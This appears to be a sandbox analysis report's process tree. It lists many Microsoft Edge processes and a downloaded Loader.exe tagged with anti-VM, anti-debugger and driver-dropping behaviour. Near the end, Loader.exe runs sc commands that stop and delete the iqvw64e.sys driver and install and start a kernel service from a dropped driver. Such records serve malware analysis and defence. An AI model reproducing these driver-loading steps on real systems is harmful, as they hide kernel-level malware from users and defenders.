  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1972 /prefetch:2
  2⤵
  PID:2020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
  2⤵
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2508 /prefetch:8
  2⤵
  PID:3520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
  2⤵
  PID:2396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3924 /prefetch:1
  2⤵
  PID:1256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1412 /prefetch:1
  2⤵
  PID:1692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3480 /prefetch:8
  2⤵
  PID:668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3364 /prefetch:8
  2⤵
  PID:2868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=1412 /prefetch:8
  2⤵
  - Modifies registry class
  PID:2440
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8
  2⤵
  PID:1760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
  2⤵
  PID:3688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
  2⤵
  PID:1628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
  2⤵
  PID:3640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
  2⤵
  PID:5108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1
  2⤵
  PID:1688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4260 /prefetch:1
  2⤵
  PID:4148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:1
  2⤵
  PID:3000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
  2⤵
  PID:1836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:1
  2⤵
  PID:1092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6172 /prefetch:1
  2⤵
  PID:5060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
  2⤵
  PID:4116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
  2⤵
  PID:4832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1
  2⤵
  PID:3356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1648 /prefetch:1
  2⤵
  PID:2776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
  2⤵
  PID:4024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7140 /prefetch:1
  2⤵
  PID:1172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
  2⤵
  PID:4148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3924 /prefetch:1
  2⤵
  PID:3548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6984 /prefetch:1
  2⤵
  PID:1548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7868 /prefetch:1
  2⤵
  PID:4140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8072 /prefetch:1
  2⤵
  PID:5196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8172 /prefetch:1
  2⤵
  PID:5204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8480 /prefetch:1
  2⤵
  PID:5336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8608 /prefetch:1
  2⤵
  PID:5404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8772 /prefetch:1
  2⤵
  PID:5472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8924 /prefetch:1
  2⤵
  PID:5540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9076 /prefetch:1
  2⤵
  PID:5652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9176 /prefetch:1
  2⤵
  PID:5660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:1
  2⤵
  PID:5800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9584 /prefetch:1
  2⤵
  PID:5808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9628 /prefetch:1
  2⤵
  PID:5944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9716 /prefetch:1
  2⤵
  PID:5952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10444 /prefetch:1
  2⤵
  PID:5876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10452 /prefetch:1
  2⤵
  PID:6424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9804 /prefetch:1
  2⤵
  PID:6572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7360 /prefetch:1
  2⤵
  PID:7024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
  2⤵
  PID:7096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7872 /prefetch:1
  2⤵
  PID:6188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
  2⤵
  PID:5516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:1
  2⤵
  PID:5660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:1
  2⤵
  PID:5804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7996 /prefetch:8
  2⤵
  PID:6020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8216 /prefetch:1
  2⤵
  PID:5944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7732 /prefetch:1
  2⤵
  PID:5884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7620 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:6340
- C:\Users\Admin\Downloads\Loader.exe
  "C:\Users\Admin\Downloads\Loader.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Drops file in System32 directory
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  PID:6440
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C sc stop iqvw64e.sys
    3⤵
    PID:1820
  - - C:\Windows\system32\sc.exe
      sc stop iqvw64e.sys
      4⤵
      Launches sc.exe
      PID:4048
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C sc delete iqvw64e.sys
    3⤵
    PID:4116
  - - C:\Windows\system32\sc.exe
      sc delete iqvw64e.sys
      4⤵
      Launches sc.exe
      PID:6748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:3136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:6508
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C sc create windowsproc type=kernel binpath=C:\Windows\System32\drivers\winhb.sys
    3⤵
    PID:6760
  - - C:\Windows\system32\sc.exe
      sc create windowsproc type=kernel binpath=C:\Windows\System32\drivers\winhb.sys
      4⤵
      Launches sc.exe
      PID:5588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:6804
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C sc start windowsproc
    3⤵
    PID:6816
  - - C:\Windows\system32\sc.exe
      sc start windowsproc
      4⤵
      Launches sc.exe
      PID:6864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:6844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4368 /prefetch:1
  2⤵
  PID:4436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7636 /prefetch:1
  2⤵
  PID:5396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
  2⤵
  PID:6536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7816 /prefetch:2
  2⤵
  PID:748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7300 /prefetch:1
  2⤵
  PID:5436
